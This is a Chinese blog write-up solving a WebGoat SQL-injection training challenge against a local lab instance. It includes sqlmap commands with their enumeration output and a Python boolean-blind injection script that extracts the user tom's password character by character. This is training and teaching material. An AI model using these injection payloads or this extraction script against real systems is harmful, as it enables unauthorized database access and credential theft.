WebGoat---Injection Flaws---SQL Injection (advanced) 5 解法_webgoat sql注入(高级) 第五关-程序员宅基地

技术标签:   webgoat  

经过测试,发现注册时的用户名处存在布尔盲注,将如下内容保存为request.txt,开始用sqlmap

PUT http://127.0.0.1:8080/WebGoat/SqlInjection/challenge HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://127.0.0.1:8080/WebGoat/start.mvc
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Cookie: JSESSIONID=61E3648728C46675C274BC0980B448BE
Connection: keep-alive
Host: 127.0.0.1:8080

username_reg=hello&email_reg=1%40q.com&password_reg=world&confirm_password_reg=world

要注意的是Cookie有时限
执行如下命令:

# 探测数据库类型,结果为:HSQLDB,并且建议加--no-cast参数
sqlmap -r request.txt -p username_reg

# 查数据库,获取3个数据库名:
# [*] INFORMATION_SCHEMA
# [*] PUBLIC
# [*] SYSTEM_LOBS
sqlmap -r request.txt -p username_reg --dbs --no-cast

# 查PUBLIC数据库,选择爆破,线程选最大的10,得到6张表
# Database: PUBLIC
# [6 tables]
# +--------------+
# | auth         |
# | employee     |
# | roles        |
# | servers      |
# | transactions |
# | user_data    |
# +--------------+
sqlmap -r request.txt -p username_reg -D PUBLIC --tables --no-cast

# 获取user_data表的字段
# Database: PUBLIC
# Table: USER_DATA
# [10 columns]
# +-------------+-------------+
# | Column      | Type        |
# +-------------+-------------+
# | cc_number   | non-numeric |
# | cc_type     | non-numeric |
# | cookie      | non-numeric |
# | email       | non-numeric |
# | first_name  | non-numeric |
# | last_name   | non-numeric |
# | login_count | numeric     |
# | password    | non-numeric |
# | today       | numeric     |
# | userid      | numeric     |
# +-------------+-------------+
sqlmap -r request.txt -p username_reg -D PUBLIC -T user_data --columns --no-cast

# 最后一步出错了,,,

通过看源码发现,自己连正确的表都没有注出来,sqlmap就不指望了,写脚本跑吧

# coding:utf8

"""
True: already exists please try to register with a different username.
False: created, please proceed to the login page.

我解这个问题其实是在蒙,用sqlmap爆破发现register的username_reg有bool盲注,然后用sqlmap一通,知道一个表中有password字段,然后sqlmap再往下就出错了,没办法,写脚本吧,已经知道了字段,就直接盲注字段,老是不对,看源码才知道用户名原来是tom,小写的t,这样就得到密码了

但其实看源码之后才发现,sqlmap搞出来的表和我要注入的表是不一样的,就这样吧,误打误撞出来了

源码位置: WebGoat/webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/advanced/SqlInjectionChallenge.java
"""

import requests


def get_status(content):
    if 'already exists please try to register with a different username.' in content:
        return 1
    elif 'created, please proceed to the login page.' in content:
        return 0
    else:
        return -1


url = 'http://127.0.0.1:8080/WebGoat/SqlInjection/challenge'

headers = {
    
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Referer': 'http://127.0.0.1:8080/WebGoat/start.mvc',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Length': '85',
    'Cookie': 'JSESSIONID=F15EA9332EAE5CFBD726887EA270BC9C',
    'Connection': 'keep-alive',
    'Host': '127.0.0.1:8080',
    }

data = {
    
    'username_reg': 'a',
    'email_reg': '[email protected]',
    'password_reg': 'a',
    'confirm_password_reg': 'a',
}

s = requests.session()

tom_pass_len = 0
for i in range(2, 100):
    data['username_reg'] = "tom' AND LENGTH(password)=%d AND '1'='1" % i
    res = s.put(url, headers=headers, data=data)
    if get_status(res.content) == -1:
        print 'Error'
        print res.content
        exit(0)
    elif get_status(res.content) == 0:
        continue
    elif get_status(res.content) == 1:
        print 'password len: %d' % i
        tom_pass_len = i
        break

tom_password = ['*'] * tom_pass_len
common_chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
for i in range(1, tom_pass_len+1):
    for c in common_chars:
        data['username_reg'] = "tom' AND SUBSTRING(password, %d, 1)='%s" % (i, c)
        res = s.put(url, headers=headers, data=data)
        if get_status(res.content) == -1:
            print 'Error'
            print res.content
            exit(0)
        elif get_status(res.content) == 0:
            continue
        elif get_status(res.content) == 1:
            print c
            tom_password[i-1] = c
            break

print 'tom_password: ', ''.join(tom_password)

参考: https://klarsen.net/infosec/owasp-webgoat-sql-advanced-lesson/
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuqi7/article/details/83552458

智能推荐

一文详解从拉格朗日乘子法、KKT条件、对偶上升法到罚函数与增广Lagrangian乘子法再到ADMM算法(交替方向乘子法)_拉格朗日乘子 二次惩罚系数-程序员宅基地

文章浏览阅读4.7k次,点赞19次,收藏129次。最近看了ADMM算法,发现这个算法需要用到许多不少前备知识,在搜索补齐这些知识的过程中感觉网上的资料与总结在零散的同时又不够清晰,在此本文对这一块的内容进行汇总,同时表达自己的一些理解。拉格朗日乘子法本段内容参考了拉格朗日(Lagrange)乘子法超简说明。先从物理意义上介绍拉格朗日乘子法。原问题我们要解决带有等式约束的最优化问题。为方便书写,以二维函数为例:maxf(x,y),s.t.g(x,y)=0用下图表示这个问题。 f(x,y)参数x,y在二维平面内,存..._拉格朗日乘子 二次惩罚系数

Python设计双序列全局比对的程序——生物信息_编写代码找出blosum62矩阵中得分最高的氨基酸配对-程序员宅基地

文章浏览阅读1w次,点赞20次,收藏100次。基本概念“**双序列比对**”一般来说,是对两个DNA或蛋白质序列进行比较,从而找出两者之间最大的相似性匹配。主要是为了确定两个序列之间的相似性源自于同源性,按照一定的规律进行排序。比对过程中,错配与突变相对应,而空位对应于插入或删除。该研究还可以拓展到现在热门的语言文本的研究中。在生物信息处理中,我们希望找出两条序列S和T之间具有的某种相似性关系,这种寻找生物序列相似性关系的算法就是**双..._编写代码找出blosum62矩阵中得分最高的氨基酸配对

traefik-ingress 实现http自动跳转https_ingress httponly-程序员宅基地

文章浏览阅读3.1k次。简介Kubernetes目前ingress主流的就是nginx-ingress和traefik-ingress.nginx-ingress中实现http转https加一个注解就可以了,很简单。但是traefik-ingress好像稍微要复杂一点。现就将整个过程整理成文。条件1. Kubernetes集群2.集群已经安装traefik-ingress插件步骤1.部署nginx应用和服务#kubectl apply -f nginx.yamlapiVersion: apps.._ingress httponly

电脑防泄密系统如何构建企业数据防泄密架构-程序员宅基地

文章浏览阅读223次。这些加密技术,不仅可以支持图纸文档类型的文件加密如:cad,sloidworks,ug等二维三维图纸,还支持源代码的加密,如c、c++、c#、java等开发语言的支持。安秉电脑防泄密系统,还可以保护企业当数据发生泄漏时,可以进行日志查询,找到泄漏根源,从根本上解决数据泄密的事情发生。2,审批授权,对于涉密的数据,需要外发时,可以设置在线审批管理员授权,经过管理员审批后同意外发的数据方可带离公司电脑正常使用。4,报警,对于员电脑特殊的泄密行业,可以设置管理端报警,发现可疑情况立即报警,及时发现问题并且整改。

MATLAB时域分析(附完整代码)_matlab进行时域性能分析-程序员宅基地

文章浏览阅读845次,点赞10次,收藏10次。MATLAB时域分析(附完整代码)_matlab进行时域性能分析

git取消【删除】已经提交的文件(夹)跟踪_git rm --cached <file/folder>-程序员宅基地

文章浏览阅读754次。git取消【删除】已经提交的文件(夹)跟踪git rm -r --cached <fold> 不删除本地文件git rm -r --f <fold> 删除本地文件git rm --cached <file> 不删除本地文件,仅仅不再跟踪文件git rm --f <file> 删除本地文件,并且不再跟踪文件..._git rm --cached

随便推点

【Linux】Linux cgroup(Control Groups)常见用法_cgroup监控资源状态-程序员宅基地

文章浏览阅读250次,点赞3次,收藏5次。Linux cgroup(Control Groups)是一种强大的资源管理工具,它允许系统管理员对系统资源进行细粒度的控制。cgroup通过将进程分组并对这些组施加限制,从而实现资源的隔离和优先级控制。_cgroup监控资源状态

php dynamic library,PHP Startup: Unable to load dynamic library 问题。-程序员宅基地

文章浏览阅读845次。PHP Startup: Unable to load dynamic library … (tried:… 这种算是比较常见的问题,当然这里只讨论在保证 php.ini 中启用了相关扩展,并且相应的.dll文件确实存在于加载目录中的情况。我个人遇到的是’pdo_firebird’和 ‘pdo_oci’.D:\Tool\php\php-7.2.7-Win32-VC15-x64>phpWarn..._unable to load dynamic library 'pdo_firebird

web3之以太坊链二层(layer2):StarkNet_ethereum layer 2 network starknet-程序员宅基地

文章浏览阅读1.3k次,点赞27次,收藏22次。StarkWare公司一直致力于通过零知识证明(ZK)来解决区块链扩容问题,先后研发了2个L2方案——StarkEx和StarkNet。_ethereum layer 2 network starknet

网页方向培训—JavaScript第二讲_当修改文本框内容后,触发onchange事件,调用check函数-程序员宅基地

文章浏览阅读340次。JavaScript第二讲一、事件响应1.1 什么是事件&nbsp;&nbsp;JavaScript 创建动态页面。事件是可以被 JavaScript 侦测到的行为。 网页中的每个元素都可以产生某些可以触发 JavaScript 函数或程序的事件。比如说,当用户单击按钮或者提交表单数据时,就发生一个鼠标单击(onclick)事件,需要浏览器做出处理,返回给用户一个结果。..._当修改文本框内容后,触发onchange事件,调用check函数

java语言的命题原则_《 Java 语言程序设计(一) 》 课程全国统一命题考试说明 _ 重庆自考网...-程序员宅基地

文章浏览阅读68次。《 Java 语言程序设计(一) 》 课程全国统一命题考试说明为组织好高等教育自学考试 《 Java 语言程序设计(一) ) )课程的全国统一考试命题工作,根据全国统一命题课程的有关规定,特制定本说明。一、考试原则1 .考试标准本课程考试参照全日制普通高校同专业、同层次、同课程的 Java 语言程序设计(一)本科结业水平,并体现自学考试以培养应用型人才为主要目标的特点。在题量匕能够使中等水平的考生...

微信二维码转换成链接_微信二维码链接-程序员宅基地

文章浏览阅读6w次,点赞9次,收藏35次。微信二维码转换成链接我们很多人都在想,怎样才能把二维码转换成网址链接,然后点击网址链接就直接进入二维码呢?下面就是转换成链接的方法之一:微信转链接步骤一:打开https://cli.im/deqr然后上传你的二维码图片,然后得到解码网址(如下图);步骤二:http://qr.topscan.com/api.php?text= 然后加上你的解码后的网址;步骤三:http://h5..._微信二维码链接

推荐文章

热门文章

相关标签